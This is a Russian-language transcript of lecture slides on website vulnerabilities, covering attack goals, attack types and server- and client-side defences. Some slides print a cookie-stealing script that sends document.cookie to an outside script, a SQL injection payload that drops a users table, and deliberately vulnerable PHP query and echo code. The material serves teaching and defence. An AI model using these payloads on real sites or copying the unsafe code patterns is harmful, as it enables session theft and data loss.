Уязвимость сайтов и обеспечение их безопасности. Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации.

Презентация:



Advertisements
Похожие презентации
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты.
Advertisements

Безопасный код © Александр Швец
Сетевые черви и защита от них. СЕТЕВЫЕ ЧЕРВИ Сетевые черви - это вредоносные программы, которые проникают на компьютер, используя сервисы компьютерных.
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 2. Cross-site request forgery.
Практика противодействия сетевым атакам на интернет-сайты Сергей Рыжиков директор ООО «Битрикс» РИФ-2006 Секция «Информационная безопасность»
Хакерские утилиты и защита от них. СЕТЕВЫЕ АТАКИ Сетевые атаки - направленные действия на удаленные сервера для создания затруднений в работе или утери.
Хакерские утилиты и защита от них. СЕТЕВЫЕ АТАКИ Сетевые атаки - направленные действия на удаленные сервера для создания затруднений в работе или утери.
Хакерские утилиты и защита от них Работа выполнена Миненко Еленой ученицей 10 Б класса.
Тестирование безопасности или Security and Access Control Testing.
СЕТЕВЫЕ ЧЕРВИ Свидетель 1. СЕТЕВЫЕ ЧЕРВИ Сетевые черви - это вредоносные программы, которые проникают на компьютер, используя сервисы компьютерных сетей:
Сетевые черви и защита от них. СЕТЕВЫЕ ЧЕРВИ Сетевые черви - это вредоносные программы, которые проникают на компьютер, используя сервисы компьютерных.
Безопасность Веб-приложений Дмитрий Евтеев Эксперт по информационной безопасности.
Защита информации. Защита информации представляет собой деятельность по предотвращению утечки защищаемой информации, несанкционированных и непреднамеренных.
Безопасность веб-проектов Защита сайтов от взломов и атак Сергей Рыжиков директор компании «Битрикс»
Нарушение целостности структуры SQL-запроса. Внедрение SQL-кода (SQL injection) один из распространённых способов взлома ПО, работающего с базами данных,
ОСНОВНЫЕ ВИДЫ И ПРИЕМЫ ХАКЕРСКИХ АТАК Свидетель 3.
проявление индивидуальности уважается и поощряется; сеть следует защищать.
Безопасность интернет-проекта Основные угрозы Инструменты безопасности в платформе.
О безопасности сайта думают в последнюю очередь! индивидуальные разработчики думают о безопасности сайтов в самую последнюю очередь клиенты не готовы платить.
Организация корпоративной защиты от вредоносных программ Алексей Неверов Пермский государственный университет, кафедра Процессов управления и информационной.
Транксрипт:

Уязвимость сайтов и обеспечение их безопасности

Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации Выведение сайтов из строя, удаление данных Замена содержимого сайтов, размещение рекламной информации

Предметы атак на сайты WWW-сервера: Операционная система HTTP-сервер Серверные расширения Веб-приложения WWW-клиенты: Операционная система (внедрение вирусов) Получение cookie, хранящихся на компьютере

Виды сетевых атак DoS-атаки и DDoS-атаки ( Distributed Denial of Service ) Фишинг (phishing) ip-спуфинг (spoofing) Троянский конь (Spyware) drive-by download (загрузка программ на сервер) Cross-Site Scripting (CSS) (HTML injection) SQL injection XSS (межсайтовый скриптинг) CSRF (Cross-site request forgery) Атака одного клика Без использования сетевых средств

HTML injection window.open(" t.cgi?cookie="+document.cookie)

SQL injection $firstname = $_POST["firstname"]; mysql_query("SELECT * FROM users WHERE first_name='$firstname'"); Если firstname = "'; drop table users; #", то код удалит таблицу пользователей

XSS (межсайтовый скриптинг) $firstname = $_GET["firstname"]; echo "Your name: $firstname"; Если firstname = " … ", то скрипт будет выполнен Достаточно дать пользователям ссылку …

CSRF Атака одного клика Заставить клиента выполнить нужный запрос

Защита от интернет-атак Защита на стороне сервера: Настройка прав на компьютере-сервере Настройка http-сервера Аккуратное программирование на стороне сервера Проверка входящих http-запросов Защита на клиенте: Общая антивирусная защита Проверка входящего http-трафика Настройки безопасности браузеров Разумные методы хранения паролей и конфиденциальных данных